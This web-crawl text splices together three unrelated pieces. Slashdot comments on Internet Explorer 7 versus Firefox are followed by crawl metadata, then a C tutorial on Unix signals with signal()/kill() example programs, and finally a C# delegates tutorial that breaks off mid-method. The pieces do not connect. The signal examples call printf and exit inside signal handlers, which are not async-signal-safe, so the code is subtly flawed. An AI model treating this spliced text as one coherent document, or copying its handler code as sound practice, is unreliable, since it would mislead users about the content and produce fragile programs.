In the last 5 years or so, Apple has gone absolutely apeshit with apps that totally defy their earlier style guidelines. Nobody talks about MacOS's "consistent experience" anymore. What price did Apple end up paying for this? None. Did as many people leave MacOS in protest over the bizarre UIs, as migrated to MacOS after saying "ooh, shiney!!!"? Hell no. Nobody protested at all, except usability nerds, and we all know they have sticks up their butts, anyway.
;-)
Microsoft has probably learned something about human nature over the years. And perhaps one lesson they've learned, is that making bizarre arbitrary changes to UIs, is a good way to make people think something is "new and improved." It worked for Apple, so it will probably work for Microsoft.
Re: (Score:2)
There are two points with the metal interface. The first is that the gray color just vanishes when browsing or watching videos; it doesn't compete with the colors of the video. Compare that to WIE7's "interface", which looks like a fucking christmas tree or pile of candy.
The other point is that just plain gray is something that you associate with Windows; it still has to be slick and stylish. Th
IE7 is a functional browser, but not much else (Score:5, Insightful)
IE7 is far less integrated to the OS like IE6 was. Or at least it seems so. It used to be that you could open web addresses in My Computer and Explorer would "become" IE and navigate to the address. Now, doing the same thing triggers a Firefox window to open and navigate to the address, since Firefox is set to my default browser. Not a bad feature here, but interesting.
Another issue that I personally have, but won't apply to many others, is using a runas shortcut to get to Explorer. I used to have a shortcut that used runas to open IE6 as an administrator. Then I could type "Control Panel" or C:/ and go about my business with an admin window while still logged in as my normal restricted user. Very convenient and I rarely found myself logging on as an administrator to do anything. With IE7, it's merely a browser and you can't (that I've seen) get to the control panel or navigate the file system with it. If you type in C:\ for example, IE7 will open another Explorer window to the C: drive. What's really odd, though, is that this new window opens with the permissions of my restricted user even though the IE7 window was running as an administrator. Usually (or in the past) a window opened would inherit the user permissions of the parent. (FYI, pointing the runas shortcut to Windows Explorer doesn't work, nothing opens.)
Other than those issues, there's really no problems. It's a functional browser and not much else.
What misses the mark, though, is the majority of the add-ons for IE. I got excited once I started reading over the list until I realized most of the were not free. Paying for add-ons? Are you kidding me? Even the ones that are free sound good, but miss the mark when compared to similar add-ons that I'm familiar with.
There's an IESpell add-on that'll spell check text areas for you. Instead of underlining misspelled words like their Office app (and Firefox 2.0) does, you have to click a button to spell check the text areas for you. Functional, but annoying.
There's an InlineSearch add-on that'll find words as you type, ala Firefox or whoever had it first (I don't care who). However, instead of just searching as you type, you have to press Control-F first to open the search dialog along the bottom of the page. Maybe this is better for some people, but if you're going to copy something and make it different, at least give the option to make it behave like whatever you copied. The other problem with this add-on is that is only installs for the user who runs the
There's there's Fiddler which promises to be like LiveHTTPHeaders in Firefox. For the most part it is, but again, it just misses the mark. First, it's just another program and other than capturing HTTP requests that IE makes, I don't see how it's really an add-on for IE. Second, a big feature of LiveHTTPHeaders (and others, I'm sure) is that you can replay HTTP requests after modifying any of the request headers and see the results in the browser. Unless I missed something, Fiddler let's you replay the modified HTTP request, but only shows you the raw HTML response, instead of actually loading it into a browser window. Functional, but annoying.
There are others that are annoying, too, mostly be requiring administrator permissions for some obscure installation folder, but some are good. The NoMoreCookies add-on is useful since IE7's cookie management is non-existent. I did not find any way to delete individual cookies or view their contents. There's a DevToolbar that has some useful features, too.Not that I have a use for them, but there are StumbleUpon and MouseGesture add-ons for IE7, to
great summary (Score:4, Insightful)
I bet the IE guys are microsoft read the article and are sulking about how their browser isn't ready to take on the competition. Oh well, I guess they can always take solace in their 88% market share.
Mod parent Funny (Score:3, Funny)
I mean:
and:
Re: (Score:2)
This isn't about what browser is best, it's about this little clique who feels superior to IE users while ignoring the fact that Firefox is a better product overall.
See I can insert any browser into that statement and it still sounds like trolling. Opera fanboys can have their browser. Go for it. I even included Opera in MidnightBSD mports. P
Re:For non-standard...see Mac OS (Score:2)
Re: (Score:2)
There are a limited number of reasons to support a six year old, soon to be two generation old operating system. In addition, I think that there are probably a number of technical reasons why it "can't be done" namely the fact that there is no XP SP2 equiavlent update for w2k.
Also, Microsoft would be just a little crazy to continue throwing money at the one useful OS that does not require activation.
Not saying I don't think w2k is decent OS, and certainly not on its "last legs".
Re: (Score:2)
Read TFA the entire thing is an opinion piece, there are no bugs mentioned, there are were no technical differences mentioned, which is why I bothered to write this in the first place.
There are no benchmarks for page loading. There are no side by side comparisons of features. Just broad, vague statements about how IE has a long way to go compared to FF and Opera.
The issue that the author brought
Re: (Score:2)
If you read farther up, that's because IE7 uses ClearType [microsoft.com] to smooth out the letters. You can install ClearType as an XP PowerToy from MS, too, so it'll apply system wide (including Firefox).
---John Holmes...
Re: (Score:2) | https://slashdot.org/story/06/10/24/1836218/ie7-from-a-firefox-users-perspective | CC-MAIN-2017-13 | refinedweb | 4,482 | 71.04 |
AuroraDNS DNS driver documentation¶
PCextreme B.V. is a Dutch cloud provider. It provides a public cloud offering under the name AuroraCompute. All cloud services are under the family name Aurora.
AuroraDNS is a highly available DNS service which also provides health checking.
Records can be attached to a health check. When this health check becomes unhealthy this record will no longer be served.
This provides the possibility to create loadbalancing over multiple servers without the requirement of a central loadbalancer in the network. It is also provider agnostic, health checks can point to any IP/Host on the internet.
Instantiating a driver¶
When you instantiate a driver, you need to pass a your
key and
secret
to the driver constructor. These can be obtained in the control panel of
AuroraDNS.
For example:
from libcloud.dns.types import Provider from libcloud.dns.providers import get_driver cls = get_driver(Provider.AURORADNS) driver = cls('myapikey', 'mysecret')
Disabling and enabling records¶
Records in can be disabled and enabled. By default all new records are enabled, but this property can be set during creation and can be updated.
For example:
from libcloud.dns.types import Provider from libcloud.dns.providers import get_driver cls = get_driver(Provider.AURORADNS) driver = cls('myapikey', 'mysecret')
In this example we create a record, but disable it. This means it will not be served.
Afterwards we enable the record and this make the DNS server serve this specific record.
Health Checks¶
AuroraDNS has support for Health Checks which will disable all records attached to that health check should it fail. With this you can create DNS based loadbalancing over multiple records.
In the example below we create a health check and afterwards attach a newly created record to this health check.
For example:
from libcloud.dns.types import Provider, RecordType from libcloud.dns.providers import get_driver from libcloud.dns.drivers.auroradns import AuroraDNSHealthCheckType cls = get_driver(Provider.AURORADNS) driver = cls('myapikey', 'mysecret') zone = driver.get_zone('auroradns.eu') health_check = driver.ex_create_healthcheck(zone=zone, type=AuroraDNSHealthCheckType.HTTP, hostname='web01.auroradns.eu', path='/', port=80, interval=10, threshold=5) record = zone.create_record(name='www', type=RecordType.AAAA, data='2a00:f10:452::1', extra={'health_check_id': health_check.id})
API Docs¶
- class
libcloud.dns.drivers.auroradns.
AuroraDNSDriver(key, secret=None, secure=True, host=None, port=None, **kwargs)[source]¶
ex_create_healthcheck(zone, type, hostname, port, path, interval, threshold, ipaddress=None, enabled=True, extra=None)[source]¶
Create a new Health Check in a zone
ex_update_healthcheck(healthcheck, type=None, hostname=None, ipaddress=None, port=None, path=None, interval=None, threshold=None, enabled=None, extra=None)[source]¶
Update an existing Health Check
export_zone_to_bind_zone_file(zone, file_path)¶
Export Zone object to the BIND compatible format and write result to a file. | https://libcloud.readthedocs.io/en/latest/dns/drivers/auroradns.html | CC-MAIN-2017-43 | refinedweb | 445 | 52.36 |
JComboBox with horizontall scroll bar
jack morton
Greenhorn
Posts: 16
Brian Cole
Author
Ranch Hand
Ranch Hand
Posts: 907
1
jack morton wrote:I created this custom ComboBox:
When i add this ComboBox to a Frame, it has a look and feel diffrent from the others componet
How to resolve that
If you know what L&F will be used, you can override the specific ComboBoxUI for that L&F (though it may have a structure that differs from BasicComboBoxUI, which can make it difficult). Of course it's typical to expect your code to be run under a variety of L&Fs.
This is a general problem with Swing. For this reason you don't really want to override UIs to change functionality, though sometimes there's no other way. I just spent a few minutes looking for some example code I saw somewhere that uses crazy reflection techniques to (effectively) override a method in a dynamic UI delegate, but I couldn't find it. The technique probably wouldn't have worked for your situation anyway.
[edit: spell delegate correctly]
Just another cross poster.
luck, db
There are no new questions, but there may be new answers.
Carlos Hoces
Greenhorn
Posts: 2
jack morton wrote:Hi all,
I created this custom ComboBox:
[code]import com.sun.java.swing.*;
import com.sun.java.swing.plaf.basic.*;
public class myCombo extends JComboBox{
public myCombo(){
super();
setUI(new myComboUI());
}
Jackm
In case you extend your class, like:
public class HComboBox extends myCombo{
public HComboBox(){
this.updateUI();
...
}
will set the current LaF during the execution of your class constructor.
This is how I use it, and it works well with Substance LaF, ie.
I guess if you do the same with your class, as is, it'll work equally well.
| http://www.coderanch.com/t/432788/GUI/java/JComboBox-horizontall-scroll-bar | CC-MAIN-2016-30 | refinedweb | 297 | 58.42 |
Redux Saga: Finishing the Clock Demo App
Implementing Saga Code
This is the third and final post in a three-part series about Redux Saga. In the first post, we warmed ourselves up to the general concepts involved. In the second, we took our relationship with Saga to the next level. We made it real. And we felt like the only developer in the room. We thought it was different this time. We thought...we were special. In this final post of the series, we are going to write the rest of the app. If you haven't already, you can clone the starter repo from this url. If you just want to skip to the final product, go ahead and check out its repo on github and live demo here.
What's my name again?
In the last post, we considered our basic yet kind of non-trivial requirements, to create a rudimentary clock that responds to some user interactions, and for some frakking reason we chose to use a bleeding-edge, space-age tech stack to achieve this. Oh yeah, it was to learn the basics of Redux Saga. Right. Cool. We took a shot of Norseman Vodka (Minneapolis, MN) and chased it with La Croix Pamplemousse flavor carbonated water, which is, of course, the best flavor of La Croix. (Edit: apparently, some Facebook developer agrees with me.) We then cloned our boilerplate repo, took another fine sip of Norseman, and began writing some code.
We determined that our minimum redux state for the app could consist of a single field, "milliseconds," to represent the clock's time. Since our clock needs to run forward, backward and be reset, we created corresponding redux actions to increment, decrement and reset the milliseconds field in state. We then jumped boldly into some saga code, creating a saga that listens for three saga actions (start, pause and rewind) and just logs them out when it receives them. Eventually, our plan is to replace this logging of actions with a process that runs the clock, sending out a decrement action every second, for example, and thus side-effecting the app state in a strictly defined way. Finally, we created a plain-jane React component to let us test drive our redux and saga actions and see that the state updates accordingly and our saga code works as expected.
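Since the saga we write later dispatches `incrementMilliseconds()` without revisiting its definition, here's roughly what the redux half of that duck looks like. This is only a sketch: the action type strings, the step size, and the initial state are assumptions on my part; the real values live in the starter repo.

```javascript
// Rough sketch of the redux side of the duck. The type strings, the STEP
// value (chosen to match the saga's one-second tick), and the initial
// state are assumptions -- check the starter repo for the real thing.
const STEP = 1000

const incrementMilliseconds = () => ({ type: 'increment-milliseconds' })
const decrementMilliseconds = () => ({ type: 'decrement-milliseconds' })
const resetMilliseconds = () => ({ type: 'reset-milliseconds' })

const initialState = { milliseconds: 0 }

function reducer (state = initialState, action = {}) {
  switch (action.type) {
    case 'increment-milliseconds':
      return { milliseconds: state.milliseconds + STEP }
    case 'decrement-milliseconds':
      return { milliseconds: state.milliseconds - STEP }
    case 'reset-milliseconds':
      return initialState
    default:
      return state
  }
}
```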
Now we're going to finish this thing. We want it to look kinda cool so it impresses our friends and is fun to look at and engaging and shit, so we'll use some cool SVG techniques to make the clock draw itself as its time increments. But most importantly, we'll use Saga to make our app sing and dance. Let's start with that.
Implementing the saga
Our duck.js module is pretty minimal, and we actually only need a few more lines of code to finish the saga/redux side of our app. So far, in the "saga" part of our duck, we have this:
```javascript
export function* rootSaga () {
  yield takeLatest(['start-clock', 'pause-clock', 'rewind-clock'], handleClockAction)
}

function* handleClockAction ({ type }) {
  console.log('Pushed this action to handleClockAction: ', type)
}
```
As we discussed in the previous post, `takeLatest` will listen for an action type or array of action types and run another process (in our case, `handleClockAction`) each time an action with a matching type is fired. It will also cancel any running process it had previously started. This is important to remember for later on. Also, `takeLatest` passes the full action object, which is why we can use that in `handleClockAction`.
handleClockAction, and we will want to do something different for each of our three saga actions. Let's stub out that basic structure in the code. Replace the single line in
handleClockAction with an
if/else if block that hits a different branch of the
if/else if for each action type and then logs out some arbitrary text to prove that we hit the right code.
I'll give you a second on that...
...still waiting patiently...
...alright, hurry it up!
Done? OK, good. Here's what my `handleClockAction` looks like:

```javascript
function* handleClockAction ({ type }) {
  if (type === 'start-clock') {
    console.log(`Received ${type}. We need to run the clock forward here.`)
  } else if (type === 'rewind-clock') {
    console.log(`Received ${type}. We need to run the clock backwards here.`)
  } else if (type === 'pause-clock') {
    console.log(`Received ${type}. Guess what needs to be done here?`)
  }
}
```
Now run the app (npm start), go to localhost:8080, open up the javascript console and test out the saga actions (they're wired up to those buttons underneath the SVG). We see the appropriate message logged out for each action. Sweet. So now we just need to figure out what to do when we receive each action.
When we get the start clock action, we want to increment the clock every 1000 milliseconds. For that, we can pull in a little helper from saga called "delay." Edit your import from redux-saga so it looks like this:

```javascript
import { delay, takeLatest } from 'redux-saga'
```
Delay is so simple as to be self-explanatory. It takes one argument, number of milliseconds, and then pauses execution for that amount of time, a la `yield delay(50)`. Let's add some logic to the branch of our `if/else if` that logs to the console every 1000 ms. Remember that you want this to repeat indefinitely. We can use a simple, native javascript control flow structure in order to implement this...I'll let you guess what it is.
No peeking.
Take a minute and try some ideas out.
OK, here's what I have:
```javascript
function* handleClockAction ({ type }) {
  if (type === 'start-clock') {
    while (true) {
      yield delay(1000)
      console.log(`Received ${type}. We need to run the clock forward here.`)
    }
  } else if (type === 'rewind-clock') {
    console.log(`Received ${type}. We need to run the clock backwards here.`)
  } else if (type === 'pause-clock') {
    console.log(`Received ${type}. Guess what needs to be done here?`)
  }
}
```
At this point, it's incredibly informative to go to your browser with the javascript console open and play with the saga actions, looking at what gets logged out. You'll see that the start clock action does indeed pause for 1000 ms, then log something out, then repeat indefinitely. Also, notice the very crucial fact that whenever our `takeLatest` in the root saga receives a new matching action, it cancels the currently running `handleClockAction`. Since we need to do nothing but cancel any current clock action when the pause clock action is received, guess what we can do? Delete some code! Pause clock will automatically work because `takeLatest` cancels the current `handleClockAction`, stopping the clock whether it's running forward or backwards. Make sure you understand this key feature of `takeLatest`. Make the appropriate changes in `handleClockAction`. You should now have something like this:
function* handleClockAction ({ type }) { if (type === 'start-clock') { while (true) { yield delay(1000) console.log(`Received ${type}. We need to run the clock forward here.`) } } else if (type === 'rewind-clock') { console.log(`Received ${type}. We need to run the clock backwards here.`) } }
Now let's get really wild and actually dispatch an action within the while loop. Whoa.
(Side note: we aren't actually dispatching an action, we're just requesting that the middleware do so. But don't worry about that just yet, I'll explain it later.)
To dispatch an action within a saga, we'll use the
put side effect. Add the following line to the top of your duck file:
import { put } from 'redux-saga/effects'
To request that an action be dispatched with
put, we just use this simple syntax:
yield put({ type: 'hi', data: 'I am an action' }). That means, of course, that we can invoke an action creator that returns a plain object within the put like this
yield put(someAction()). (Function arguments are evaluated immediately in javascript.) Hey, remember those redux actions we created way back at the beginning of the app? Let's use one. Go to the while loop in
handleClockAction and give
put a test drive:
function* handleClockAction ({ type }) { if (type === 'start-clock') { while (true) { yield delay(1000) yield put(incrementMilliseconds()) } } else if (type === 'rewind-clock') { console.log(`Received ${type}. We need to run the clock backwards here.`) } }
Go try it in your browser. Notice that the clock time shown underneath the SVG is actually incrementing. Funk yeah.
To run the clock backwards, we can reuse most of the code from start clock. Go ahead and try it out.
Did you write the code? Is it working? Toil away a bit longer if you need to.
Here's what you should have:
function* handleClockAction ({ type }) { if (type === 'start-clock') { while (true) { yield delay(1000) yield put(incrementMilliseconds()) } } else if (type === 'rewind-clock') { while (true) { yield delay(1000) yield put(decrementMilliseconds()) } } }
Now go test out all the saga actions and make sure everything behaves correctly. If it doesn't, that means you're a failure as a developer. Just kidding, of course :-) In all seriousness, if you get stuck at any point on this or any other article on my blog, leave a comment, and I'll be happy to help you out.
This is a great moment to play with the saga code and learn by experimentation. One hint:
delay is blocking, while some other effects are not. Try your hand at a
for loop. Or maybe change the
while condition to be false at some point. We've abandoned the world of promises, and now we can express all of our control flow with these simple, predictable, native javascript structures.
OK, undo any experimental changes in your saga code so that it looks like my code snippet above again.
So with that, our saga code is fully complete and operational. (Note: in the final, completed repo, I've reorganized the code a bit to make it read more clearly.)
Saga's approach to side-effects
OK, now that we've gotten some work done, let's talk about how the code works. The core idea in Redux Saga is this: we don't actually perform side-effects like dispatching to the store in our code. Instead, we yield descriptions of side-effects to the saga middleware, and the middleware performs them. Essentially, we are giving instructions back to Saga telling it what we want to happen. These side-effect descriptions are all plain objects that conform to the standard generator output of
{ value: any, done: boolean }, like we discussed in the first post of this series. For example,
yield put sends a plain object back out to the middleware containing an action object for the middleware to dispatch for us. Defining our async flows this way has some big benefits, one of them being testability. We can simply assert that our sagas are yielding the correct side-effect descriptions back to the middleware at each of their steps. (Keep your eye out for a future post that covers saga testing in-depth.)
That said, we should make one tiny update in the interest of following redux-saga best practices: add
call to your imports from redux-saga/effects and change the
yield delay(100) to be
yield call(delay, 100). Since we want to only yield side-effect descriptions back to the saga middleware, saga provides the
call effect to basically convert non-effects into effects. Instead of just yielding to
delay itself (a promise), we convert
delay to an effect via
call and yield that. We should give the same treatment to anything we
yield within saga code that isn't already a saga effect (anything not imported from
redux-saga/effects). The syntax for
call is just the function to invoke and the list of arguments to pass to it. For example:
yield call(fetch, url, options). Lastly, note that
call can be used for promises, generators or functions.
make this thing not so ugly
We need to create a file that will serve as the config for our app, holding some arbitrary constants. Why not call it "config.js"? Create the file in src/, and paste in these contents:
const MAX_RADIUS = 40 let hands = [ { ms: 144000, maxTicks: 1 }, { ms: 36000, maxTicks: 4 }, { ms: 12000, maxTicks: 3 }, { ms: 2000, maxTicks: 6 }, { ms: 400, maxTicks: 5 }, { ms: 100, maxTicks: 4 } ] export const STROKE_WIDTH = MAX_RADIUS / hands.length hands = hands.map((hand, idx) => { const radius = STROKE_WIDTH * (hands.length - idx) return { ...hand, radius, circumference: 2 * Math.PI * radius, alpha: 1 - idx / hands.length } }) export const CLOCK_HANDS = hands export const MINIMUM_MS = 100
OK, so what's going on here? Let me explain. It's a bunch of constants and calculations that will determine how exactly our SVG looks. Happy? Good. (You can dissect this on your own if you wish, but I won't get into it here since it's a little too off topic.)
OK, so now our saga code is in place and we've defined all of the configuration needed for our SVG. Let's finish off app.jsx with some updates to make the SVG more interesting.
FINISH HIM
Here's what we have currently in app.jsx:)
We need to pull in our exports from the config and pass them as props to the component. While we're at it, we can delete some unneeded imports from the duck. We're no longer going to call certain actions directly, since they will only be fired within our saga. Update the top of your file like so:
import React from 'react' import { connect } from 'react-redux' import { startClock, rewindClock, pauseClock, resetClock } from 'duck' import { CLOCK_HANDS, STROKE_WIDTH } from 'config'
So now we have all the data we need to make pretty circles within our SVG. Essentially, we are going to use a series of concentric circles to represent arbitrary hours/minutes/seconds (but with the arbitrary definitions from our config), and change the "length" of each circle so that it increases from 0 to 100% as time passes. To do the SVG drawing, we use a simple little trick explained in this CSS Tricks blog post.
We're no longer going to pass the milliseconds field from state as props. Instead, on every update to milliseconds, we're going to calculate the position for each clock hand. This is just some boring ol' mathy stuff. Basically, we iterate over each hand, largest to smallest, and put as much time on it as we can, and then repeat the process on the next hand, passing the remaining time. The smallest hand corresponds to our smallest unit of precision, 100 ms (
MAXIMUM_MS in config.js). Update your
connect call to look like this:
export default connect(state => { const currentTime = state.milliseconds let remainingTime = currentTime const getTicks = (hands, timeRemaining) => { let [hand, ...tailHands] = hands hand.ticks = Math.floor(timeRemaining / hand.ms) return tailHands.length ? [hand, ...getTicks(tailHands, timeRemaining % hand.ms)] : [hand] } const hands = getTicks(CLOCK_HANDS, remainingTime) .map((hand, idx) => { const offset = state.milliseconds >= hand.ms ? 1 : 0 const position = hand.circumference - ((hand.ticks + offset) / hand.maxTicks * hand.circumference) return { ...hand, position } }) return { hands } }, ({ startClock, rewindClock, resetClock, pauseClock }))(Clock)
Now we need to pull in the new
hands prop in our component. Update the destructured assignment of props in the render method:
render () { const { hands, startClock, rewindClock, resetClock, pauseClock } = this.props
For the grand finale, we'll make one final change. We're going update our SVG to start the clock
onMouseEnter, rewind
onMouseLeave, and pause
onClick. Go ahead and plug in those changes.
I'll wait. I need to go get some vodka. Tonight, I'm side-by-side tasting Norseman and Tattersall vodkas. brb
Mmmmmm....de-lish. The Tattersall vodka has a slightly creamy flavor along with a subtle sweetness, and a more prominent "boozy" character. The Norseman is still much smoother, if not overly minimal for some tastes, with its own sweet undertone and crisp bite with a faint hint of citrus.
OK, you got those changes done? Good. Now we're going to create the concentric circles within the SVG. We need to iterate
hands and create a
<circle/> SVG element for each one, using our calculated values to set the radius, circumference, position and transparency for each hand. If you fancy yourself an SVG wizard, go ahead and make these changes on your own.
Here's our final update. This is what you should be returning from
render():
return ( <svg onMouseEnter={ startClock } onMouseLeave={ rewindClock } onDoubleClick={ resetClock } onClick={ pauseClock } { hands.map((hand, index) => { const { radius, circumference, position, alpha } = hand return ( <circle key={ index } cx="50" cy="50" r={ radius } stroke={ `rgba(1,1,1,${alpha})` } fill="none" strokeWidth={ STROKE_WIDTH } strokeDasharray={ circumference } strokeDashoffset={ position } /> ) }) } </svg> )
Shit, I forgot something. Go over to duck.js, and import MINIMUM_MS from config:
import { MINIMUM_MS } from 'config'
Now replace the
1000 in the delay calls with
MINIMUM_MS. The clock is going to tick every 100 ms.
function* handleClockAction ({ type }) { if (type === 'start-clock') { while (true) { yield delay(MINIMUM_MS) yield put(incrementMilliseconds()) } } else if (type === 'rewind-clock') { while (true) { yield delay(MINIMUM_MS) yield put(decrementMilliseconds()) } } }
See how easy it is to change control flow logic in saga?
Whip Out Your Clock
Now let's give this thing a whirl.
npm start and open up localhost:8080 in your browser.
There you have it. A working clock that we can pause, resume, run forwards and backwards and reset. And it's even kind of cool looking.
The End
Thanks for reading this tutorial! We covered the basics of javascript generators and Redux Saga in the context of a small demo app. I hope I've helped you understand how to use Redux Saga, as well as the benefits and reasoning behind it.
If you want to learn more about Redux Saga, here are a handful of great tutorials you can check out. These helped me immensely when I was first starting to learn saga:
Most importantly and obviously, the tutorial in the Redux Saga official docs is invaluable. This is the first thing you should read (and read all of it):
Niels Gerritsen's intro to Redux Saga. This is one of the first things I read about saga, and its clear language really helped me past the conceptual hurdles:
This tutorial by Joel Hooks, which walks you through a digestible, concrete example (like I tried to do here):
Jack Hsu's article on saga vs thunk for managing side-effects (my use case here is basically an extension of his):
I'd also like to credit the authors of the following articles that demystified generators, whose crystal clear, insightful explanations inspired me to write this series, and without which I would probably still be trying to figure out what the fuck a generator is:
David Walsh Blog's excellent introduction to ES6 generators, written by Kyle Simpson:
Axel Rauschmeyer's exhaustive (as always) article on ES6 generators:
Thanks for reading! See you next time. | http://ohyayanotherblog.ghost.io/redux-saga-finishing-the-clock-demo-app/ | CC-MAIN-2017-43 | refinedweb | 3,176 | 72.36 |
Source code of main inside exe
I just checked the strings contained in an exe compiled on windows supposedly in release (qt creator+vs2017) and I can see the source code of the main.
What I am doing wrong?
Thank you in advance
Emanuele
- sierdzio Moderators last edited by
What I am doing wrong?
If you mean you can see method names: you are doing nothing wrong, this is normal.
If you want to hide them, use some C+ obfuscation technique / software.
No, I mean I can see the entire source code of the main.
I used this:
on my exe and I can see the entire source code of the main:
#include <QApplication>
#include <QCommandLineParser>
....
Yes, I also see some method names, but this is not a big problem.
- sierdzio Moderators last edited by
No idea then, that's weird.
- jsulm Qt Champions 2018 last edited by
@3cxitalydev Did you check the build log to see how the compiler was called (what parameters were passed to it)?
- VRonin Qt Champions 2018 last edited by
You probably compiled in debug mode. Try switching to release and see if the same happens
Hi,
many thanks to all of you.
At the end I discovered that I added by mistake the main as resource file... :(
Sorry for bothering you.
Emanuele
- aha_1980 Qt Champions 2018 last edited by
@3cxitalydev Glad you figured it out.
Then please mark this topic as SOLVED. Thanks. | https://forum.qt.io/topic/105217/source-code-of-main-inside-exe/8 | CC-MAIN-2019-43 | refinedweb | 239 | 81.83 |
class HelloWorld {
  public static void main(String[] args) {
    System.out.println("Hello, world");
  }
}
A class that will never become an object, with one method, which I have to specify is public, static, and has a return type. Compare to PythonLanguage
print( "Hello, world!" )
Or, if you want import-ability:
def hello_world():
    print("Hello, world!")

if __name__ == "__main__":
    hello_world()
Isn't this only an issue if you never write programs more complex than print("Jello, Whirled")? Well, I wish that at least the compiler were smarter. If I could write main {...} or void main() {...}, it would be OK, but I have to specify that it has a return type, which must be void or the program crashes. I mean, the thing is, all of these don't work:
class Complex {
  public float real, imag;
  public Complex(float _real, float _imag) {
    real = _real;
    imag = _imag;
  }
  // add/subtract/mul/div/equal methods not defined because they are not really important to the example.
  public static void main(String[] args) {
    if (new Complex(1, 1).add(new Complex(-1, -1)).equal(0))
      System.exit(0);
    System.exit(1); // unit test failed
  }
}
All right, I guess, but...bleah. On the other hand, it clearly distinguishes the special case of launching a program -- for which String[] args exists and may be parsed -- from instantiating a class. The alternative would be to require any "launch-able as program" class to define a special constructor that accepts, say, a single parameter of Object[] args. That would not be significantly different from public static void main(String[] args), except to force instantiation of an object, which may be pointless overhead if the user has supplied invalid arguments. That's exactly it. I'd rather just write the code, and I'd rather not all of it be in classes--some of which have no purpose in instantiation. [There is more than one such alternative. A bit of reflection could allow parsing command-line arguments based on the types accepted by constructors and methods and such.] True. Feel free to r/The/An/. It would potentially subject users to a wonderfully unhelpful "No matching constructor or static method found for the supplied arguments" or similar error message, though I suppose the error could be trapped and transformed into something friendlier. And it would benefit from additional syntax to exclude constructors and methods not intended for program launch, but those might inadvertently be invoked by the right combination and/or type of command-line arguments. Oh, and if the user enters 'program 3' at the command-line and there's both 'program(int x)' and 'program(String x)' constructors, which one gets invoked? What if the user enters 'program "3"'? And so on.
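The ambiguity can be made concrete with a small sketch. Everything here is invented for illustration -- the class, the dispatch rule, and the tie-breaking policy are hypothetical, not part of any real launcher:

```java
import java.lang.reflect.Constructor;

// Hypothetical "constructors as entry points" launcher sketch.
class Program {
    Program(int x)    { System.out.println("int ctor: " + x); }
    Program(String x) { System.out.println("String ctor: " + x); }

    public static void main(String[] args) throws Exception {
        String arg = args.length > 0 ? args[0] : "3";
        // Both 'program 3' and 'program "3"' arrive here as the string "3",
        // so the quoting distinction is already lost before dispatch. One
        // possible (arbitrary) rule: prefer the int constructor whenever
        // the argument parses as an integer.
        try {
            int n = Integer.parseInt(arg);
            Constructor<Program> c = Program.class.getDeclaredConstructor(int.class);
            c.newInstance(n);
        } catch (NumberFormatException e) {
            Constructor<Program> c = Program.class.getDeclaredConstructor(String.class);
            c.newInstance(arg);
        }
    }
}
```

Whatever rule the launcher picks, the user cannot express "no, the other constructor" without extra syntax.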
On the other hand, it makes instantiation within the application homologous to instantiation from outside the application. Dunno... The yuck piles up quickly. | http://c2.com/cgi-bin/wiki?PublicStaticVoidMain | CC-MAIN-2015-27 | refinedweb | 477 | 56.25 |
Describes the visual structure of a data object.
Public Class DataTemplate _
Inherits FrameworkTemplate
Dim instance As DataTemplate
public class DataTemplate : FrameworkTemplate
<DataTemplate ...>
templateContent
</DataTemplate>
The tree of objects that defines this DataTemplate. The tree must have a single root element, and that root element can have zero or more child elements. For more information, see ContentControl.ContentTemplate.
You can place a DataTemplate as the direct child of a property element such as ContentControl.ContentTemplate or ItemsControl.ItemTemplate.
As an example, a DataTemplate can be used to display the items of a ListBox that is bound to a collection of Customer objects. Such a DataTemplate might contain TextBlock controls that bind to the FirstName, LastName, and Address properties. For more information on data binding, see Data Binding.
For a list of the operating systems and browsers that are supported by Silverlight, see Supported Operating Systems and Browsers. | http://msdn.microsoft.com/en-us/library/system.windows.datatemplate(VS.95).aspx | crawl-002 | refinedweb | 142 | 51.14 |
Signals:
Each signal defined by the system falls into one of five classes:
Macros are defined in the <signal.h> header file for common signals.
These include SIGHUP (hangup), SIGINT (interrupt, usually ctrl-c), SIGQUIT (quit, usually ctrl-\), SIGKILL (kill, which cannot be caught or ignored), SIGALRM (alarm clock), and SIGTERM (software termination).
Signals can be numbered from 0 to 31.
#include <stdio.h>
#include <signal.h>
#include <stdlib.h>

void sigproc(int);
void quitproc(int);

int main(void)
{  signal(SIGINT, sigproc);
   signal(SIGQUIT, quitproc);
   printf("ctrl-c disabled use ctrl-\\ to quit\n");
   for(;;); /* loop forever, waiting for signals */
}

void sigproc(int signum)
{  signal(SIGINT, sigproc); /* some versions of UNIX reset the handler
                               to the default after each call, so re-install it */
   printf("you have pressed ctrl-c\n");
}

void quitproc(int signum)
{  printf("ctrl-\\ pressed to quit\n");
   exit(0); /* normal exit status */
}
An example of two processes communicating using signals is sig_talk.c:
/* sig_talk.c --- Example of how 2 processes can talk */
/* to each other using kill() and signal() */
/* We will fork() a child and let the parent send a few */
/* signals to its child */
/* cc sig_talk.c -o sig_talk */

#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <unistd.h>

void sighup(int);  /* routines child will call upon receiving a signal */
void sigint(int);
void sigquit(int);

int main(void)
{ int pid;

  /* get child process */
  if ((pid = fork()) < 0) {
      perror("fork");
      exit(1);
  }

  if (pid == 0) { /* child */
      signal(SIGHUP, sighup);  /* set function calls */
      signal(SIGINT, sigint);
      signal(SIGQUIT, sigquit);
      for(;;); /* loop forever, waiting for signals */
  }
  else { /* parent: pid holds id of child */
      printf("\nPARENT: sending SIGHUP\n\n");
      kill(pid, SIGHUP);
      sleep(3); /* pause for 3 secs */
      printf("\nPARENT: sending SIGINT\n\n");
      kill(pid, SIGINT);
      sleep(3); /* pause for 3 secs */
      printf("\nPARENT: sending SIGQUIT\n\n");
      kill(pid, SIGQUIT);
      sleep(3);
  }
  return 0;
}

void sighup(int signum)
{ signal(SIGHUP, sighup); /* reset signal */
  printf("CHILD: I have received a SIGHUP\n");
}

void sigint(int signum)
{ signal(SIGINT, sigint); /* reset signal */
  printf("CHILD: I have received a SIGINT\n");
}

void sigquit(int signum)
{ printf("My DADDY has Killed me!!!\n");
  exit(0);
}
Delegates
Delegates are types that hold references to methods rather than data. A delegate can copy the behavior of any method. To declare a delegate, you use the delegate keyword. Declaring a delegate is similar to declaring a method, except that it has no body. It has a return type and a set of parameters just like a method. These tell what kind of method it can hold. Below is the syntax for declaring a delegate.
delegate returnType DelegateName(dt param1, dt param2, ... dt paramN);
The following example program shows how to use and the benefits of using a delegate.
using System;

namespace DelegatesDemo
{
    public class Program
    {
        delegate void ArithmeticDelegate(int num1, int num2);

        static void Add(int x, int y)
        {
